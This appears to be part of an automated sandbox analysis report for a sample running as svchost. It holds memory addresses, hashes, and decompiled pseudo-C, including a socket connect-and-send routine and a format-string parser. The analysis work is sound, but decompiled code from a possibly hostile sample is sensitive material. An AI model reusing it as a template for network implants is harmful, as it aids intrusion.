                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026f34
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026f10
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026ef0
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026ed9
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026e90
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026e7a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026e2b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026dff
                                                                                                                                                                                                                                                                      0x04026d8f
                                                                                                                                                                                                                                                                      0x04026d5f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026d5f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026d2f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026d06
                                                                                                                                                                                                                                                                      0x04026ff0
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026ff6
                                                                                                                                                                                                                                                                      0x04026ffa
                                                                                                                                                                                                                                                                      0x04026ffc
                                                                                                                                                                                                                                                                      0x04026fff
                                                                                                                                                                                                                                                                      0x0402700b
                                                                                                                                                                                                                                                                      0x04027012
                                                                                                                                                                                                                                                                      0x04027026
                                                                                                                                                                                                                                                                      0x04027014
                                                                                                                                                                                                                                                                      0x0402701e
                                                                                                                                                                                                                                                                      0x0402701e
                                                                                                                                                                                                                                                                      0x04027030
                                                                                                                                                                                                                                                                      0x04027030
                                                                                                                                                                                                                                                                      0x04027047
                                                                                                                                                                                                                                                                      0x04027047
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04026C8A
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMTD ref: 04027019
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                                                                                                      • String ID: ir\
                                                                                                                                                                                                                                                                      • API String ID: 3817610042-1854106103
                                                                                                                                                                                                                                                                      • Opcode ID: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                                                                                                      • Instruction ID: 71bce72721c98fd701a8830471f0d2f2c7e2f459ebc33f17165b16ca64a09b40
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 013e048e50c599f190f400021c24b0a8665a3a58535e8dc2fb7aab1ea6fdaade
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AD118B0D00228DBDF54DFE8DA94BEDBBB1BF48308F108569E405BB280E735A945DB51
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 18%
                                                                                                                                                                                                                                                                      			E04020920(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				short _v42;
                                                                                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                                                                                      				intOrPtr _t102;
                                                                                                                                                                                                                                                                      				intOrPtr _t106;
                                                                                                                                                                                                                                                                      				void* _t126;
                                                                                                                                                                                                                                                                      				intOrPtr _t140;
                                                                                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                                                                                      				signed int _t164;
                                                                                                                                                                                                                                                                      				void* _t165;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t163 = __esi;
                                                                                                                                                                                                                                                                      				_t162 = __edi;
                                                                                                                                                                                                                                                                      				_t126 = __ebx;
                                                                                                                                                                                                                                                                      				_v28 =  *0x429024 ^ _t164;
                                                                                                                                                                                                                                                                      				_v64 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                                                      					_v16 = 0xffffffff;
                                                                                                                                                                                                                                                                      					_v12 = 0;
                                                                                                                                                                                                                                                                      					while(_a4 != 0 && (_a8 & 0x0000ffff) != 0) {
                                                                                                                                                                                                                                                                      						_v16 =  *0x425284(2, 1, 6, 0, 0, 1);
                                                                                                                                                                                                                                                                      						__eflags = _v16 - 0xffffffff;
                                                                                                                                                                                                                                                                      						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                      							_v20 = 0;
                                                                                                                                                                                                                                                                      							 *0x42527c(_v16, 0xffff, 0x1001,  &_v20, 4);
                                                                                                                                                                                                                                                                      							E04007010(_t162,  &_v44, 0, 0x10);
                                                                                                                                                                                                                                                                      							_t165 = _t165 + 0xc;
                                                                                                                                                                                                                                                                      							_v44 = 2;
                                                                                                                                                                                                                                                                      							_v40 = 0;
                                                                                                                                                                                                                                                                      							_v42 = 0;
                                                                                                                                                                                                                                                                      							_t101 =  *0x425280(_v16,  &_v44, 0x10);
                                                                                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                                                                                      							if(_t101 == 0) {
                                                                                                                                                                                                                                                                      								_t102 = E04020CE0(0x5c);
                                                                                                                                                                                                                                                                      								_t165 = _t165 + 4;
                                                                                                                                                                                                                                                                      								_v52 = _t102;
                                                                                                                                                                                                                                                                      								__eflags = _v52;
                                                                                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                                                                                      									_v68 = 0;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_v68 = E04005630(_v52, __eflags);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_v12 = _v68;
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_v12 + 0x34)) = 0x77777777;
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_v12 + 0x54)) = 2;
                                                                                                                                                                                                                                                                      								_v48 =  *0x42516c(_v16,  *((intOrPtr*)(_v64 + 8)), _v12, 0);
                                                                                                                                                                                                                                                                      								_t106 = _v64;
                                                                                                                                                                                                                                                                      								__eflags = _v48 -  *((intOrPtr*)(_t106 + 8));
                                                                                                                                                                                                                                                                      								if(_v48 ==  *((intOrPtr*)(_t106 + 8))) {
                                                                                                                                                                                                                                                                      									E04007010(_t162,  &_v44, 0, 0x10);
                                                                                                                                                                                                                                                                      									_v44 = 2;
                                                                                                                                                                                                                                                                      									_v40 = _a4;
                                                                                                                                                                                                                                                                      									_v42 =  *0x425278(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_v12 + 0x30)) = _v64;
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_v12 + 0x28)) = _v16;
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_v12 + 0x2c)) = 2;
                                                                                                                                                                                                                                                                      									E04006CA0(_t126, _t162, _t163, _v12 + 0x38,  &_v44);
                                                                                                                                                                                                                                                                      									_t165 = _t165 + 0x18;
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_v12 + 0x48)) = 0x10;
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_v12 + 0x18)) =  *((intOrPtr*)(_v12 + 0x18)) + 1;
                                                                                                                                                                                                                                                                      									_t140 = _v64;
                                                                                                                                                                                                                                                                      									_t161 =  *((intOrPtr*)(_t140 + 0xc));
                                                                                                                                                                                                                                                                      									_v24 =  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xc))))(_v16, _v12 + 0x38,  *((intOrPtr*)(_v12 + 0x48)), 0, 0, 0, _v12, 0x10);
                                                                                                                                                                                                                                                                      									__eflags = _v24;
                                                                                                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                                                                                                      										L17:
                                                                                                                                                                                                                                                                      										_v8 = E04006410(_t126,  *((intOrPtr*)(_v64 + 4)), _t162, _t163, __eflags, _v12, 0);
                                                                                                                                                                                                                                                                      										_t161 = 0;
                                                                                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                                                                                      										if(0 != 0) {
                                                                                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										goto L18;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									__eflags =  *0x425274() - 0x3e5;
                                                                                                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							goto L18;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						goto L18;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L18:
                                                                                                                                                                                                                                                                      					if(_v8 == 0) {
                                                                                                                                                                                                                                                                      						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                      							 *0x42524c(_v16);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						if(_v12 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                      							_v60 = _v12;
                                                                                                                                                                                                                                                                      							_t161 = _v60;
                                                                                                                                                                                                                                                                      							_v56 = _v60;
                                                                                                                                                                                                                                                                      							if(_v56 == 0) {
                                                                                                                                                                                                                                                                      								_v72 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v72 = E04006A90(_v56, 1);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v12 = 0x666;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} while (0 != 0);
                                                                                                                                                                                                                                                                      				return E04006C8C(_v8, _t126, _v28 ^ _t164, _t161, _t162, _t163);
                                                                                                                                                                                                                                                                      			}




























                                                                                                                                                                                                                                                                      0x04020920
                                                                                                                                                                                                                                                                      0x04020920
                                                                                                                                                                                                                                                                      0x04020920
                                                                                                                                                                                                                                                                      0x0402092d
                                                                                                                                                                                                                                                                      0x04020930
                                                                                                                                                                                                                                                                      0x04020933
                                                                                                                                                                                                                                                                      0x0402093a
                                                                                                                                                                                                                                                                      0x0402093a
                                                                                                                                                                                                                                                                      0x04020941
                                                                                                                                                                                                                                                                      0x04020948
                                                                                                                                                                                                                                                                      0x0402096d
                                                                                                                                                                                                                                                                      0x04020970
                                                                                                                                                                                                                                                                      0x04020974
                                                                                                                                                                                                                                                                      0x0402097b
                                                                                                                                                                                                                                                                      0x04020996
                                                                                                                                                                                                                                                                      0x040209a4
                                                                                                                                                                                                                                                                      0x040209a9
                                                                                                                                                                                                                                                                      0x040209b1
                                                                                                                                                                                                                                                                      0x040209b5
                                                                                                                                                                                                                                                                      0x040209be
                                                                                                                                                                                                                                                                      0x040209cc
                                                                                                                                                                                                                                                                      0x040209d2
                                                                                                                                                                                                                                                                      0x040209d4
                                                                                                                                                                                                                                                                      0x040209dd
                                                                                                                                                                                                                                                                      0x040209e2
                                                                                                                                                                                                                                                                      0x040209e5
                                                                                                                                                                                                                                                                      0x040209e8
                                                                                                                                                                                                                                                                      0x040209ec
                                                                                                                                                                                                                                                                      0x040209fb
                                                                                                                                                                                                                                                                      0x040209ee
                                                                                                                                                                                                                                                                      0x040209f6
                                                                                                                                                                                                                                                                      0x040209f6
                                                                                                                                                                                                                                                                      0x04020a05
                                                                                                                                                                                                                                                                      0x04020a0b
                                                                                                                                                                                                                                                                      0x04020a15
                                                                                                                                                                                                                                                                      0x04020a33
                                                                                                                                                                                                                                                                      0x04020a36
                                                                                                                                                                                                                                                                      0x04020a3c
                                                                                                                                                                                                                                                                      0x04020a3f
                                                                                                                                                                                                                                                                      0x04020a4e
                                                                                                                                                                                                                                                                      0x04020a5b
                                                                                                                                                                                                                                                                      0x04020a62
                                                                                                                                                                                                                                                                      0x04020a70
                                                                                                                                                                                                                                                                      0x04020a7a
                                                                                                                                                                                                                                                                      0x04020a83
                                                                                                                                                                                                                                                                      0x04020a89
                                                                                                                                                                                                                                                                      0x04020a9d
                                                                                                                                                                                                                                                                      0x04020aa2
                                                                                                                                                                                                                                                                      0x04020aa8
                                                                                                                                                                                                                                                                      0x04020abb
                                                                                                                                                                                                                                                                      0x04020ada
                                                                                                                                                                                                                                                                      0x04020add
                                                                                                                                                                                                                                                                      0x04020ae2
                                                                                                                                                                                                                                                                      0x04020ae5
                                                                                                                                                                                                                                                                      0x04020ae9
                                                                                                                                                                                                                                                                      0x04020afa
                                                                                                                                                                                                                                                                      0x04020b0b
                                                                                                                                                                                                                                                                      0x04020b0e
                                                                                                                                                                                                                                                                      0x04020b0e
                                                                                                                                                                                                                                                                      0x04020b10
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020b10
                                                                                                                                                                                                                                                                      0x04020af1
                                                                                                                                                                                                                                                                      0x04020af6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020a41
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020a3f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040209d6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04020976
                                                                                                                                                                                                                                                                      0x04020b16
                                                                                                                                                                                                                                                                      0x04020b1a
                                                                                                                                                                                                                                                                      0x04020b20
                                                                                                                                                                                                                                                                      0x04020b26
                                                                                                                                                                                                                                                                      0x04020b26
                                                                                                                                                                                                                                                                      0x04020b30
                                                                                                                                                                                                                                                                      0x04020b3b
                                                                                                                                                                                                                                                                      0x04020b3e
                                                                                                                                                                                                                                                                      0x04020b41
                                                                                                                                                                                                                                                                      0x04020b48
                                                                                                                                                                                                                                                                      0x04020b59
                                                                                                                                                                                                                                                                      0x04020b4a
                                                                                                                                                                                                                                                                      0x04020b54
                                                                                                                                                                                                                                                                      0x04020b54
                                                                                                                                                                                                                                                                      0x04020b60
                                                                                                                                                                                                                                                                      0x04020b60
                                                                                                                                                                                                                                                                      0x04020b30
                                                                                                                                                                                                                                                                      0x04020b67
                                                                                                                                                                                                                                                                      0x04020b7f

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memsetcodecvt
                                                                                                                                                                                                                                                                      • String ID: wwww
                                                                                                                                                                                                                                                                      • API String ID: 2800761558-671953474
                                                                                                                                                                                                                                                                      • Opcode ID: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                                      • Instruction ID: 61b96e00e12962727ee7777b3b76a6d85f6ef15ab9ff8b766a9639ba92e0cd34
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88813C74E00318EFEB24CFA4D985BEDBBB5AF48318F108159E605BB2D0D775AA81CB54
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                                                      • String ID: cE
                                                                                                                                                                                                                                                                      • API String ID: 2102423945-163553156
                                                                                                                                                                                                                                                                      • Opcode ID: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                                                                                                      • Instruction ID: fdc2fad14a78642c3e0d9cddc9ad9ddf1c8cf601b710c5b7852a6cc2ffa68677
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40718170E04238EAEF60CF91DA547BDB7F5AB01305F14819AE4897E1C4D7746A84DF51
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                                                                                                      			E0400A7B7(signed char __edx) {
                                                                                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                                                                                      				signed char _t51;
                                                                                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                                                                                      				signed int _t57;
                                                                                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                                                                                      				signed int _t64;
                                                                                                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                                                                                                      				signed int* _t71;
                                                                                                                                                                                                                                                                      				signed int* _t72;
                                                                                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                                                                                      				signed int _t83;
                                                                                                                                                                                                                                                                      				void* _t84;
                                                                                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                                                                                      				void* _t91;
                                                                                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                                                                                      				signed int _t98;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t89 = __edx;
                                                                                                                                                                                                                                                                      				_t103 = __edx - 0x49;
                                                                                                                                                                                                                                                                      				if(__edx == 0x49) {
                                                                                                                                                                                                                                                                      					_t50 =  *_t71;
                                                                                                                                                                                                                                                                      					__eflags = _t50 - 0x36;
                                                                                                                                                                                                                                                                      					if(_t50 != 0x36) {
                                                                                                                                                                                                                                                                      						L21:
                                                                                                                                                                                                                                                                      						__eflags = _t50 - 0x33;
                                                                                                                                                                                                                                                                      						if(_t50 != 0x33) {
                                                                                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                                                                                      							__eflags = _t50 - 0x64;
                                                                                                                                                                                                                                                                      							if(_t50 == 0x64) {
                                                                                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _t50 - 0x69;
                                                                                                                                                                                                                                                                      							if(_t50 == 0x69) {
                                                                                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _t50 - 0x6f;
                                                                                                                                                                                                                                                                      							if(_t50 == 0x6f) {
                                                                                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _t50 - 0x75;
                                                                                                                                                                                                                                                                      							if(_t50 == 0x75) {
                                                                                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _t50 - 0x78;
                                                                                                                                                                                                                                                                      							if(_t50 == 0x78) {
                                                                                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _t50 - 0x58;
                                                                                                                                                                                                                                                                      							if(_t50 == 0x58) {
                                                                                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							 *(_t98 - 0x26c) = _t93;
                                                                                                                                                                                                                                                                      							 *(_t98 - 0x238) = _t93;
                                                                                                                                                                                                                                                                      							_t64 = E0400ED68(_t89 & 0x000000ff, _t98 - 0x25c);
                                                                                                                                                                                                                                                                      							__eflags = _t64;
                                                                                                                                                                                                                                                                      							_t65 =  *(_t98 - 0x211);
                                                                                                                                                                                                                                                                      							if(_t64 == 0) {
                                                                                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                                                                                      								E0400A462(_t65,  *((intOrPtr*)(_t98 - 0x24c)), _t98 - 0x228);
                                                                                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t93 = _t98 - 0x228;
                                                                                                                                                                                                                                                                      							E0400A462(_t65,  *((intOrPtr*)(_t98 - 0x24c)), _t98 - 0x228);
                                                                                                                                                                                                                                                                      							_t65 =  *_t71;
                                                                                                                                                                                                                                                                      							 *(_t98 - 0x23c) =  &(_t71[0]);
                                                                                                                                                                                                                                                                      							__eflags =  *_t71;
                                                                                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(E0400B23F(_t103))) = 0x16;
                                                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                                                      								_t70 = E0400B1D7(_t89, _t90, _t93);
                                                                                                                                                                                                                                                                      								if( *((char*)(_t98 - 0x250)) != 0) {
                                                                                                                                                                                                                                                                      									_t70 =  *(_t98 - 0x254);
                                                                                                                                                                                                                                                                      									 *(_t70 + 0x70) =  *(_t70 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t52 = _t70 | 0xffffffff;
                                                                                                                                                                                                                                                                      								goto L38;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						__eflags = _t71[0] - 0x32;
                                                                                                                                                                                                                                                                      						if(_t71[0] != 0x32) {
                                                                                                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *(_t98 - 0x210) =  *(_t98 - 0x210) & 0xffff7fff;
                                                                                                                                                                                                                                                                      						 *(_t98 - 0x23c) =  &(_t71[0]);
                                                                                                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					__eflags = _t71[0] - 0x34;
                                                                                                                                                                                                                                                                      					if(_t71[0] != 0x34) {
                                                                                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00008000;
                                                                                                                                                                                                                                                                      					 *(_t98 - 0x23c) =  &(_t71[0]);
                                                                                                                                                                                                                                                                      					goto L33;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					__eflags = __edx - 0x68;
                                                                                                                                                                                                                                                                      					if(__edx == 0x68) {
                                                                                                                                                                                                                                                                      						 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00000020;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						__eflags = __edx - 0x6c;
                                                                                                                                                                                                                                                                      						if(__edx == 0x6c) {
                                                                                                                                                                                                                                                                      							__eflags =  *_t74 - 0x6c;
                                                                                                                                                                                                                                                                      							if( *_t74 != 0x6c) {
                                                                                                                                                                                                                                                                      								 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00000010;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00001000;
                                                                                                                                                                                                                                                                      								 *(_t98 - 0x23c) =  &(_t74[0]);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							__eflags = __edx - 0x77;
                                                                                                                                                                                                                                                                      							if(__edx == 0x77) {
                                                                                                                                                                                                                                                                      								 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00000800;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                                                                                      						_t72 =  *(_t98 - 0x23c);
                                                                                                                                                                                                                                                                      						_t51 =  *_t72;
                                                                                                                                                                                                                                                                      						 *(_t98 - 0x211) = _t51;
                                                                                                                                                                                                                                                                      						__eflags = _t51;
                                                                                                                                                                                                                                                                      						if(_t51 == 0) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t83 =  *(_t98 - 0x26c);
                                                                                                                                                                                                                                                                      						_t89 = _t51;
                                                                                                                                                                                                                                                                      						_t74 =  &(_t72[0]);
                                                                                                                                                                                                                                                                      						__eflags =  *(_t98 - 0x228);
                                                                                                                                                                                                                                                                      						 *(_t98 - 0x23c) =  &(_t72[0]);
                                                                                                                                                                                                                                                                      						if( *(_t98 - 0x228) >= 0) {
                                                                                                                                                                                                                                                                      							__eflags = _t89 - 0x20 - 0x58;
                                                                                                                                                                                                                                                                      							if(_t89 - 0x20 > 0x58) {
                                                                                                                                                                                                                                                                      								_t57 = 0;
                                                                                                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_t57 =  *(_t89 + 0x425950) & 0x0000000f;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t9 = _t57 * 8; // 0x3747193b
                                                                                                                                                                                                                                                                      							_t59 =  *(_t83 + _t9 + 0x425970) >> 4;
                                                                                                                                                                                                                                                                      							_t84 = 7;
                                                                                                                                                                                                                                                                      							 *(_t98 - 0x26c) = _t59;
                                                                                                                                                                                                                                                                      							__eflags = _t59 - _t84;
                                                                                                                                                                                                                                                                      							if(_t59 > _t84) {
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto ( *((intOrPtr*)(0x407c80 + _t59 * 4)));
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					__eflags =  *((char*)(_t98 - 0x250));
                                                                                                                                                                                                                                                                      					if( *((char*)(_t98 - 0x250)) != 0) {
                                                                                                                                                                                                                                                                      						_t54 =  *(_t98 - 0x254);
                                                                                                                                                                                                                                                                      						_t46 = _t54 + 0x70;
                                                                                                                                                                                                                                                                      						 *_t46 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                      						__eflags =  *_t46;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t52 =  *(_t98 - 0x228);
                                                                                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                                                                                      					_pop(_t91);
                                                                                                                                                                                                                                                                      					_pop(_t94);
                                                                                                                                                                                                                                                                      					_pop(_t73);
                                                                                                                                                                                                                                                                      					return E04006C8C(_t52, _t73,  *(_t98 - 4) ^ _t98, _t89, _t91, _t94);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}




















